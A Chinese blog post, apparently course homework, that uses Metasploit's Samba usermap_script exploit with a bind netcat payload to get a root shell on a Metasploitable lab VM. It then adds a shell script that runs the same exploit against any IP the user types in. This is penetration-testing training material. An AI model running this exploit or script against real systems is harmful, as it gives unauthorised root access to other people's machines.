metsploit魔鬼训练营第一章作业

最新推荐文章于 2024-08-03 21:27:48 发布
最新推荐文章于 2024-08-03 21:27:48 发布
阅读量1.3k 收藏 3
点赞数
分类专栏: metasploit魔鬼训练营笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_37641759/article/details/72859083
版权

实验一:通过攻击samba服务漏洞控制linux靶机

目标ip:192.168.232.134

metasploitable靶机下载地址:链接:http://pan.百度.com/s/1slHJcZV 密码:ndoj

实验环境:kali linux

kalimsfconsole 

msf > use exploit/multi/samba/usermap_script 

msf exploit(usermap_script) > set payload cmd/unix/bind_netcat

msf exploit(usermap_script) > show options 


Module options (exploit/multi/samba/usermap_script):


   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST                   yes       The target address
   RPORT  139              yes       The target port

Payload options (cmd/unix/bind_netcat)

msf exploit(usermap_script) > set RHOST 192.168.232.134
RHOST => 192.168.232.134
msf exploit(usermap_script) > exploit 


   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LPORT  4444             yes       The listen port
   RHOST                   no        The target address

Exploit target:


   Id  Name
   --  ----
   0   Automatic

msf exploit(usermap_script) > set RHOST 192.168.232.134
RHOST => 192.168.232.134
msf exploit(usermap_script) > exploit 

[*] Started bind handler
[*] Command shell session 1 opened (192.168.232.129:34139 -> 192.168.232.134:4444) at 2017-06-04 03:17:57 -0400

whoami 
root
uname -a
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux

ok

实验二:

用msfcli命令编写shell脚本程序,实现用户只需要输入ip地址,即可使用usermap_script漏洞渗透攻击模块


msfcli已经被取代,建议使用msfconsole  -x

kali: vim  metasploit.shell

echo "请输入目标ip"

read ip
msfconsole -x "use exploit/multi/samba/usermap_script;set payload cmd/unix/bind_netcat;set RHOST $ip;exploit"

kali:chomd a+x  metasploit.shell

kali:./metasploit







sky_seeker
关注
专栏目录
Metsploit-Unleashed
10-24
Metsploit-Unleashed,很好的学习资料
Metasploit魔鬼训练营第一章实践作业
qq_39596232的博客
03-31 488
1、搜集Samba服务usermap_script安全漏洞的相关信息: 下面是Back Track 5上面提供的相关信息: 同时也可以参考下面的网站: 我在必应上找到的感觉介绍还不错的网站,也可以参考下: https://www.rapid7.com/db/modules/exploit/multi/samba/usermap_script 2、该安全漏洞的生命周期图: 暂时不...
《MetaSploit渗透测试魔鬼训练营》之环境搭建
关注网络安全、云原生安全
01-04 1万+
目录 渗透测试流程概述 顺序 渗透标准 渗透阶段 前期交互阶段 情报搜集阶段 威胁建模阶段 漏洞分析阶段 渗透攻击阶段 后渗透分析阶段 报告阶段 环境搭建 网络环境 虚拟机镜像 BT5 owasp bwa靶机 Win2K3 metasploitable Ubuntu Metasploitable WinxpSP3 metasploitable 情报搜集阶段 通过DNS和IP挖掘(踩点) whois域名注册信息查询 ip定位查询 Google Hackin...
网络安全学习之利用Metasploit进行信息收集
最新发布
Aurevoirs的博客
08-03 883
利用metasploit 进行信息收集
【Metasploit】MSF常用命令
m0_62783065的博客
02-06 1929
【Metasploit】MSF常用命令
渗透测试工具——Metasploit
热门推荐
weixin_59872639的博客
01-14 3万+
Metasplout简介 Metasploit是一款开源的安全漏洞检测工具,同时Metasploit是免费的工具。 Metasploit核心中绝大部分有Rudy实现,一小部分由汇编和C语言实现。 kali中自带Metasploit Metasploit文件结构与模块 路径: /usr/share/metasploit-framework/ config: MSF环境配置信息,数据库配置信息 data:后渗透模块的一些工具及payload,第三方小工具集合,用户字典等数据信息 doc
《Metasploit魔鬼训练营》环境搭建与前两章经历体会
qq_55720359的博客
09-11 2010
本人信息安全专业,这学期想学习渗透测试,就在b站上看推荐书籍,无意间发现了这本书,在国内也算比较出名,就买了一本仔细学习。下载之后又遇到一个问题,也就是配置不了host-only网络,点了之后一直卡在配置网络中,上网了解之后,知道解决办法:先把之前下载的vmware player版本的文件夹删除然后关闭现在的虚拟机,再下载cclearn对电脑中的注册表进行清理即可,有需求的同学在网上搜索关键字也可以搜到,我就不过多说了。第三题和第四题,网上也是可以搜到的,我第三题并没有做全,确实不太会。
基于Ubuntu系统-渗透MySQL数据库.docx
10-19
在实验中,我们需要准备两个虚拟机,一个是Kali虚拟机,另一个是Ubuntu虚拟机。这两个虚拟机位于同一个网段中,以便进行渗透测试。 二、实验过程 1. 安装MySQL数据库 在Ubuntu虚拟机中,我们需要安装MySQL数据库...
metasploit魔鬼训练营第一章实践作业
lilywang20119的博客
05-04 2416
1.搜索Samba服务usermap_script安全漏洞相关信息 根据下面的连接,搜索到如下内容: The time line is as follows: * May 7, 2007: Initial defect disclosure to the security@samba.org email alias. * May 7, 2007: Initial de
Metasploit 渗透测试框架的基本使用(msf)
枫梓林のBlog
04-20 1014
Metasploit 渗透测试框架的基本使用 文章目录Metasploit 渗透测试框架的基本使用一、Metasploit 渗透测试框架介绍1.1 Metasploit 体系框架二、Metasploittable2-Linux 靶机系统介绍2.1 靶机信息2.2 修改root用户密码三、Metasploit 基本使用方法3.1 Metasploit 基本命令3.1.1 手动启动数据库3.1.2 查看帮助信息3.2 常用命令介绍3.2.1 核心命令中 connect 命令3.2.2 模块相关的命令 show
Shellsploit注入器简单利用
大方子
09-06 2301
        Shellsploit让您为各种操作系统生成自定义的shellcode,后门,注入器。让我们通过编码器对每个字节进行混淆。 github:  https://github.com/vasco2016/shellsploit-framework 依赖安装 root$ sudo pip install capstone root$ sudo pip install rea...
metasploit简介_Metasploit简介
weixin_26722031的博客
07-31 763
metasploit简介Metasploit is a penetration testing framework that helps you find and exploit vulnerabilities. Metasploit是一个渗透测试框架,可以帮助您发现和利用漏洞。 The Metasploit Framework is one of the most useful testing...
metasploitable2靶机
雨泽网络工作室
08-16 4914
一、Metasploitable2简介 Metasploitable2虚拟系统是一个特别制作的ubuntu操作系统,本身设计目的是作为安全工具测试和演示常见漏洞攻击的环境。其中最重要的是可以用来作为MSF攻击用的靶机。 开放了很多的高危端口如21、23、445等,而且具有很多未打补丁的高危漏洞, 如Samba MS-RPC Shell命令注入漏洞等,而且对外开放了很多服务,并且数据库允许外联等。系统中的用户口令均为弱口令。系统搭载了DVWA、Mutillidae等Web漏洞演练平台。 使用方法
metasploit介绍及使用
weixin_43873557的博客
02-07 2万+
The Metasploit Framework的简称。MSF高度模块化,即框架由多个module组成,是全球最受欢迎的工具。 是一款开源安全漏洞利用和测试工具,集成了各种平台上常见的溢出漏洞和流行的shellcode,并持续保持更新。 metasploit涵盖了渗透测试中全过程,你可以在这个框架下利用现有的Payload进行一系列的渗透测试。 目录 kali-metasploit框架目录路径: /opt/metasploit-framework/embedded/framework/ /usr/share
Metasploit技术(一)——Metasploit简介与基础
Phantom03167的博客
03-28 9484
Metasploit简介与基础
Metasploit介绍
千寻的博客
02-18 2360
文章目录Metasploit的介绍MSF中exploit模块漏洞利用exploit攻击载荷(payload)Metasploit中的 Payload 模块Meterpreter摘抄 Metasploit的介绍 MetasploitFramework(MSF)是一款开源安全漏洞检测工具,附带数千个已知的软件漏洞,并保持持续更新 Metasploit可以用来信息收集、漏洞探测、漏洞利用等渗透测试的全流程,被安全社区冠以“可以黑掉整个宇宙”之名。 刚开始的Metasploit是采用Perl语言编写的,但是再后来
metasploit魔鬼训练营第一章笔记
电风
05-17 4073
利用metasploit攻击靶机 kali自带metasploit LINUX下启动方式 1.msfconsole 2.cd /usr/share/metasploit-framework/ ./msfconsole (自带更新程序) 一.控制台形式 (1)msfconsole进入控制台终端 (2)msf>help search,MSF终端会显示该命令的参数列表,包括每个参
MSF以及Samba漏洞利用
zyh18851473527的博客
11-15 7146
文章目录MSF以及Samba漏洞利用一、Metasploit简介1.1MSF启动1.2问题报错1.2.1及时更新源1.2.2下载数据库二、Metasploit基础2.1专业术语2.2渗透攻击步骤三、主机扫描3.1使用辅助模块进行端口扫描3.1.1检查有哪些可用端口3.1.2一个小问题**3.1.3使用TCP扫描模块并检查有那些参数需要设置**3.1.4使用unset取消某个参数3.2使用辅助模块进行服务扫描3.3使用Nmap扫描3.3.1系统扫描四、漏洞利用4.1Metasploitable2搭建4.2 S
Metsploit等同的工具有哪些
05-03
Metasploit是一个非常流行的渗透测试工具,它有许多类似的工具,包括: 1. Nmap:用于网络扫描和主机发现的工具。 2. Burp Suite:用于测试Web应用程序的工具,包括漏洞扫描和攻击。 3. Wireshark:用于网络协议...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值